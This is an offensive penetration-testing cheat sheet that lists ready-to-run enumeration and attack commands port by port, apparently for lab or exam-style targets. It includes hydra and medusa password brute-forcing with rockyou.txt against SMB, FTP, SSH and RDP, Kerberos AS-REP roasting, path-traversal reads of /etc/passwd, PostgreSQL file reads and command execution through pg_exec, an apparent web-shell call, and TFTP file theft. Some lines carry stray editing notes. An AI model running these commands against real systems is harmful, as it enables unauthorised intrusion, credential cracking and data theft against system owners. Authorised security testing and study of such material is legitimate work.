### Port 445 (SMB)
smbclient -N -L //$rhost/ #445
smbclient -N //$rhost/IPC$ #445
nmap -p445 --script smb-protocols $rhost | grep "3.11"
nmap --script smb-vuln* -p139,445 -Pn $rhost
enum4linux-ng -AC $rhost #445
nxc smb $rhost -u 'anonymous' -p '' --rid-brute #445
nxc smb $rhost -u "" -p "" --users #445
nxc smb $rhost -u "" -p "" --pass-pol #445
impacket-lookupsid anonymous@$rhost #445
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost smb; exec zsh'" & disown

### Port 21 (FTP)
curl ftp://$rhost/ --user "anonymous:anonymous"
ftp anonymous@$rhost #21
nmap -sV -p21 --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -Pn $rhost
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost ftp; exec zsh'" & disown
qterminal -e "zsh -c 'medusa -u \$user -P ~/rockyou.txt -h \$rhost -M ftp; exec zsh'" & disown

### Port 2121 (FTP)
nmap -sV -p2121 --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -Pn $rhost
ftp anonymous@$rhost -P 2121 #2121
nmap --script ftp* -p2121 -Pn $rhost #2121
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost ftp -s 2121; exec zsh'" & disown

### Port 135 (RPC)
rpcclient -U "" -N $rhost -c "enumdomusers" #135
rpcclient -U "" -N $rhost -c "querydispinfo"
rpcclient -U $shortdomain/$user -N $rhost #135
rpcclient -U '' -N $rhost #135
rpcclient -U "" -N $rhost #135
rpcclient -U''%'' -N $rhost #135

### Port 22 (SSH)
ssh-keyscan $rhost
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost ssh; exec zsh'" & disown
medusa -u $user -P ~/rockyou.txt -h $rhost -M ssh #22

### Port 389 (LDAP)
jxplorer #389
nmap -p389 --script "ldap* and not brute" -n -Pn $rhost #389
Edit> ldapsearch -x -H ldap://$rhost -b "" -s base "(objectclass=*)" #389
Edit> ldapsearch -x -H "ldap://$rhost" -b "CN=$computer_name,DC=$shortdomain,DC=c0mmm" "objectclass=*" | grep description #389
Edit> ldapsearch -x -H "ldap://$rhost" -b "DC=$shortdomain,DC=c0mmm" "objectclass=*" | grep description #389
Edit> ldapsearch -x -H ldap://$rhost -b "dc=$shortdomain,dc=com" "(objectClass=user)" #389
Edit> ldapsearch -x -H ldap://$rhost -b "dc=$shortdomain,dc=com" "(objectClass=group)" #389
Edit> New tab plz nmap -p389 --script ldap-brute --script-args ldap.base='"cn=users,dc=$shortdomain,dc=c0mmm"' -Pn $rhost #389

### Port 636 (LDAPS)
# Note: No LDAPS commands were provided in the original list  #636

### Port 88 (Kerberos)
impacket-GetNPUsers -no-pass -usersfile users.txt $domain -dc-ip $rhost #88
kerbrute userenum --domain $shortdomain users.txt --dc $rhost #88

### Port 25 (SMTP)
nmap -sV -p25 --script smtp-commands,smtp-open-relay -Pn $rhost
smtp-user-enum -U /seclists/Usernames/Names/names.txt -t $rhost -m 150 #25
smtp-user-enum -M VRFY -w 30 -U users.txt -t $rhost -v #25
smtp-user-enum -M RCPT -U users.list -D $domain -t $rhost #25

### Port 53 (DNS)
dig $domain @$rhost #53
dig axfr $domain @$rhost #53
dig any $domain @$rhost #53
dig any www.$domain #53
dig axfr internal.$domain @$rhost #53
dig axfr ns1.$domain @$rhost @ns.$domain #53
qterminal -e "zsh -c 'for dnsname in \$(cat /usr/share/seclists/Discovery/DNS/namelist.txt); do host \$dnsname.\$domain \$rhost; done | grep \"has address\"; exec zsh'" & disown

### Port 80 (HTTP)
anyHTTP including 8080 etc
locate admin portals etc using ffuf or google
curl -s http://$rhost/robots.txt
curl -s http://$rhost | batcat -s --plain #80
ffuf -w /path/to/lfi-payloads.txt -u http://$rhost/page?file=FUZZ
curl "http://$rhost/file?name=../../../../etc/passwd"
open http://$rhost #80
ffuf parameter fuzzing - dirsearch, file extensions such as php, txt, zip etc #80
cewl -d 2 -m 5 -w create_user.txt https://$rhost/  #80
cewl -d 2 -m 5 -w create_user.txt https://$rhost/xyz-corp  #80
wpscan --url http://$rhost/wordPressSiteLocation? -e ap,at,u --plugins-detection aggressive -t 20 #80
curl -s http://blog.$domain/ | grep -e 'WordPress' -e 'plugins' -e 'themes' #80
curl -s http://blog.$domain/?p=1 | grep -e 'WordPress' -e 'plugins' -e 'themes' #80
curl -s http://blog.$domain/wp-content/themes/twentynineteen/404.php?0=id #80
cadaver http://$rhost/ITproject #80
cadaver http://$rhost/maybe-it-cred-requires #80

### Port 443 (HTTPS)
curl -k https://$rhost
sslscan $rhost:443 #443
wafw00f -v https://$domain #443

### MSSQL (Port 1433)
sqsh -S $rhost -U sa -P ""
nmap -sV -p1433 --script ms-sql-info -Pn $rhost

### Port 3306 (MySQL)
mysql -u $user -h $rhost #3306 try with no password #3306
mysql -h $rhost -u "" -p"" #3306
nmap -sV -p3306 --script mysql-info,mysql-variables -Pn $rhost #3306
nmap -sV -p3306 --script mysql-databases -Pn $rhost #3306

### PostgreSQL (Port 5432)
psql -h $rhost -U postgres
psql -h $rhost -U postgres -c "COPY (SELECT pg_read_file('/etc/passwd')) TO STDOUT"
psql -h $rhost -U postgres -c "COPY (SELECT pg_read_file('C:\\Windows\\win.ini')) TO STDOUT"
psql -h $rhost -U postgres -c "COPY (SELECT pg_exec('whoami')) TO STDOUT"

### Port 3389 (RDP)
qterminal -e "zsh -c 'hydra -I -l \$user -P ~/rockyou.txt -e nsr -t 1 \$rhost rdp; exec zsh'" & disown

### Port 6379 (Redis)
redis-cli -h $rhost #6379
redis-cli -h $rhost keys * #6379

### NFS (Port 2049)
showmount -e $rhost

### SNMP (Port 161)
snmpwalk -v1 -c public $rhost #161
qterminal -e "zsh -c 'onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $rhost; exec zsh'" & disown

### Elasticsearch (Port 9200)
curl -s http://$rhost:9200/_cat/indices
curl -s http://$rhost:9200/_cluster/health

### MongoDB (Port 27017)
mongo --host $rhost --eval "db.version()"
mongo --host $rhost --eval "db.getCollectionNames()"

### CouchDB (Port 5984)
curl -s http://$rhost:5984/_all_dbs
curl -s http://$rhost:5984/_utils/

### Docker (Port 2375)
docker -H tcp://$rhost:2375 ps
docker -H tcp://$rhost:2375 images

### IPMI (Port 623)
ipmitool -I lanplus -C 0 -H $rhost -U "" -P "" user list (IPMI user enumeration)
nmap -sU -p623 --script ipmi-version.nse $rhost

### Rsync (Port 873)
rsync rsync://$rhost

### CoAP (Port 5683)
coap-client -m get "coap://$rhost:5683/.well-known/core" 
TFTP (Port 69)
tftp $rhost → get /etc/passwd
